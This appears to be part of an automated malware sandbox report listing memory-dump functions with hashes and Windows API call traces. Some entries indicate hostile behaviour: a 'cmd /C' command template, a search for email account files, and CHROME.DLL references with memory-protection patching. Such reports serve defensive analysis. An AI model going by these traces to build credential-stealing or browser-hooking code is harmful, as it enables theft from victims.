  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
